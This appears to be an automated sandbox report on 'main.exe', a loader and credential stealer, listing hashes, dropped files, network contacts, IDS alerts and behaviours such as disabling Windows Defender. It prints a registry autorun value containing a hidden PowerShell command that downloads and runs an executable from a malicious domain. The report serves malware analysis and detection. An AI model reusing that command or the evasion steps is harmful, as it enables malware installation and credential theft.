File name:	main.exe
Full analysis:	https://app.any.run/tasks/b3ff44a4-03ca-4171-a940-9a929c6c0b7a
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	January 04, 2026, 00:44:50
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	loader auto-startup python websocket github remote sparkrat evasion stealer auto-reg luna arch-doc ip-check golang pyinstaller
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32 executable (console) Intel 80386, for MS Windows, 5 sections
MD5:	5871EFF93D8B4BF1D6060B81D4B8EC6D
SHA1:	5DFC00E6241E978DFA1986C87714587F0B62EBF8
SHA256:	63F29B4FC23AEA41F30F9022376B48F1591105B6138CC67C38CC6B5B66EAE8FC
SSDEEP:	3072:TxttZA0XLuM3WRigst783uHqbuCwQH3vFhAtlVg/CcoJZvB/JmyxC2v80kXBV6P8:Txtv13WRigs983EqbuCwQH3vFhAtlVgj

.exe	\|	Win32 Executable MS Visual C++ (generic) (41)
.exe	\|	Win64 Executable (generic) (36.3)
.dll	\|	Win32 Dynamic Link Library (generic) (8.6)
.exe	\|	Win32 Executable (generic) (5.9)
.exe	\|	Win16/32 Executable Delphi generic (2.7)

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2018:02:01 20:46:15+00:00
ImageFileCharacteristics:	No relocs, Executable, No line numbers, No symbols, 32-bit
PEType:	PE32
LinkerVersion:	2.5
CodeSize:	67584
InitializedDataSize:	29184
UninitializedDataSize:	-
EntryPoint:	0x1000
OSVersion:	4
ImageVersion:	-
SubsystemVersion:	4
Subsystem:	Windows command line


(PID) Process:	(7644) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	WindowsUpdater
Value: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://download.ilovegrooming.xyz/main.exe' -OutFile '%USERPROFILE%\main.exe'; Start-Process '%USERPROFILE%\main.exe' -WindowStyle Hidden"

PID	Process	Filename		Type
7728	main.exe	C:\Users\admin\AppData\Local\Temp\EDB2.tmp\EDB3.tmp\EDB4.vbs		binary
		MD5:0DD4F2A9DABF5B44B48FC64C334EF53F	SHA256:3709EA543B05BCC83170342E143E327387016DC61F606EC7D147C35BFA2F3433
7792	cscript.exe	C:\Users\admin\AppData\Local\Temp\update_temp\Update.exe		executable
		MD5:D2C59A00CBC22FD4F07043138814FBE2	SHA256:10FCA076384A292F5E79BB6B92DBAEFBF63AD025D5DAE392007A993FB5391FCA
7792	cscript.exe	C:\Users\admin\AppData\Local\Temp\update_temp\Discord.exe		executable
		MD5:BF571C2FCF47B5E04CF9DB8C7F83856A	SHA256:0CA95455C68C8B5009BD903947067DAA22AEA6E1239FF9B2475CA6158A41B5DF
7792	cscript.exe	C:\Users\admin\AppData\Local\Temp\update_temp\Realtek Audio Manager.exe		executable
		MD5:11B889ADA9AD0327E0834CB6AEB568F2	SHA256:A74F7D3655DA283E3F2CB197EE3358D13A052FDE1FD0A10A4183FB0C312B5A0C
7792	cscript.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Realtek Audio Manager.exe		executable
		MD5:11B889ADA9AD0327E0834CB6AEB568F2	SHA256:A74F7D3655DA283E3F2CB197EE3358D13A052FDE1FD0A10A4183FB0C312B5A0C
7792	cscript.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe		executable
		MD5:D2C59A00CBC22FD4F07043138814FBE2	SHA256:10FCA076384A292F5E79BB6B92DBAEFBF63AD025D5DAE392007A993FB5391FCA
7792	cscript.exe	C:\Users\admin\AppData\Local\Temp\update_temp\WSSecurity.exe		executable
		MD5:FA3A27B70958CF7CB052C37D0399C9B3	SHA256:2BBD691E69EFCA373365776E38C44D93C7CE075DECA99D0ABD79305B55C64444
7644	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eukkltqq.j03.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7644	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_g50shuu2.4i1.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7792	cscript.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\krpc.exe		executable
		MD5:E9F90DDA1355F0D41F0146070474F528	SHA256:CC59CA8749AE0CDAA1A99C8BE95FE19A88AC943C485908065096F34ED974E947

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6300	svchost.exe	GET	200	2.16.164.120:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
6768	MoUsoCoreWorker.exe	GET	200	2.16.164.120:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	2.16.164.120:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
6300	svchost.exe	GET	200	23.59.18.102:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	200	23.59.18.102:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
6768	MoUsoCoreWorker.exe	GET	200	23.59.18.102:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	POST	200	40.126.31.67:443	https://login.live.com/RST2.srf	unknown	xml	11.1 Kb	unknown
—	—	POST	200	40.126.31.67:443	https://login.live.com/RST2.srf	unknown	xml	10.3 Kb	unknown
—	—	POST	200	20.190.159.75:443	https://login.live.com/RST2.srf	unknown	xml	10.3 Kb	unknown
7792	cscript.exe	GET	200	188.114.96.3:443	https://download.ilovegrooming.xyz/Realtek%20Audio%20Manager.exe	unknown	executable	128 Kb	unknown

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	Not routed	—	whitelisted
—	—	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
4	System	192.168.100.255:138	—	Not routed	—	whitelisted
6300	svchost.exe	2.16.164.120:80	crl.microsoft.com	AKAMAI-ASN1	NL	whitelisted
6768	MoUsoCoreWorker.exe	2.16.164.120:80	crl.microsoft.com	AKAMAI-ASN1	NL	whitelisted
—	—	2.16.164.120:80	crl.microsoft.com	AKAMAI-ASN1	NL	whitelisted
6300	svchost.exe	23.59.18.102:80	www.microsoft.com	AKAMAI-AS	US	whitelisted
—	—	23.59.18.102:80	www.microsoft.com	AKAMAI-AS	US	whitelisted
6768	MoUsoCoreWorker.exe	23.59.18.102:80	www.microsoft.com	AKAMAI-AS	US	whitelisted
2240	svchost.exe	40.126.32.136:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146 40.127.240.158	whitelisted
google.com	142.250.186.174	whitelisted
crl.microsoft.com	2.16.164.120 2.16.164.49	whitelisted
www.microsoft.com	23.59.18.102	whitelisted
login.live.com	40.126.32.136 40.126.32.134 20.190.160.67 20.190.160.2 20.190.160.128 20.190.160.22 20.190.160.17 40.126.32.133	whitelisted
download.ilovegrooming.xyz	188.114.96.3 188.114.97.3	unknown
client.wns.windows.com	172.211.123.250	whitelisted
maruuking.ilovegrooming.xyz	188.114.97.3 188.114.96.3	unknown
tusmuertos.ilovegrooming.xyz	188.114.97.3 188.114.96.3	unknown
github.com	140.82.121.4	whitelisted

PID	Process	Class	Message
—	—	Potentially Bad Traffic	ET INFO PE EXE or DLL Windows file download HTTP
—	—	Potentially Bad Traffic	ET HUNTING Request for EXE via WinHTTP M1
—	—	Misc activity	ET INFO WinHttpRequest Downloading EXE
—	—	Exploit Kit Activity Detected	ET EXPLOIT_KIT WinHttpRequest Downloading EXE Non-Port 80 (Likely Exploit Kit)
—	—	Misc activity	ET INFO EXE - Served Attached HTTP
—	—	A Network Trojan was detected	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
—	—	Potentially Bad Traffic	ET HUNTING Request for EXE via WinHTTP M1
—	—	A Network Trojan was detected	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
—	—	Potentially Bad Traffic	ET HUNTING Request for EXE via WinHTTP M1
—	—	A Network Trojan was detected	ET MALWARE Possible Malicious Macro DL EXE Feb 2016 (WinHTTPRequest)

General Info

main.exe

5871EFF93D8B4BF1D6060B81D4B8EC6D

5DFC00E6241E978DFA1986C87714587F0B62EBF8

63F29B4FC23AEA41F30F9022376B48F1591105B6138CC67C38CC6B5B66EAE8FC

3072:TxttZA0XLuM3WRigst783uHqbuCwQH3vFhAtlVg/CcoJZvB/JmyxC2v80kXBV6P8:Txtv13WRigs983EqbuCwQH3vFhAtlVgj

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Accesses environment variables (SCRIPT)

Gets %appdata% folder path (SCRIPT)

Creates a new folder (SCRIPT)

Sends HTTP request (SCRIPT)

Gets a file object corresponding to the file in a specified path (SCRIPT)

Opens a text file (SCRIPT)

Checks whether a specified folder exists (SCRIPT)

Creates internet connection object (SCRIPT)

Opens an HTTP connection (SCRIPT)

Create files in the Startup directory

Copies file to a new location (SCRIPT)

Uses sleep, probably for evasion detection (SCRIPT)

Changes powershell execution policy (Bypass)

Bypass execution policy to execute commands

Run PowerShell with an invisible window

Changes the autorun value in the registry

Deletes a file (SCRIPT)

Changes settings for sending potential threat samples to Microsoft servers

Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

Changes settings for reporting to Microsoft Active Protection Service (MAPS)

Changes Windows Defender settings

Changes settings for checking scripts for malicious actions

Changes settings for real-time protection

Changes Controlled Folder Access settings

Actions looks like stealing of personal data

Adds extension to the Windows Defender exclusion list

Steals credentials from Web Browsers

Changes settings for protection against network attacks (IPS)

Adds path to the Windows Defender exclusion list

LUNA has been detected

SUSPICIOUS

The process executes VB scripts

Creates FileSystem object to access computer's file system (SCRIPT)

Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

Writes binary data to a Stream object (SCRIPT)

Executable content was dropped or overwritten

Saves data to a binary file (SCRIPT)

Reads data from a binary Stream object (SCRIPT)

Runs shell command (SCRIPT)

Downloads file from URI via Powershell

Starts POWERSHELL.EXE for commands execution

Creates new registry property (POWERSHELL)

Hides errors and continues executing the command without stopping

Starts process via Powershell

Uses TASKKILL.EXE to kill process

The process drops C-runtime libraries

Process drops python dynamic module

Process drops legitimate windows executable

Starts CMD.EXE for commands execution

Application launched itself

Loads Python modules

Script disables Windows Defender's real-time protection

Script disables Windows Defender's IPS

Uses NETSH.EXE to obtain data on the network

Checks for external IP

Script adds exclusion path to Windows Defender

The process hide an interactive prompt from the user

There is functionality for taking screenshot (YARA)

There is functionality for capture public ip (YARA)

Script adds exclusion extension to Windows Defender

Reads security settings of Internet Explorer

Reads the date of Windows installation

Runs WScript without displaying logo

INFO

Checks supported languages

Create files in a temporary directory

Reads security settings of Internet Explorer

Launching a file from the Startup directory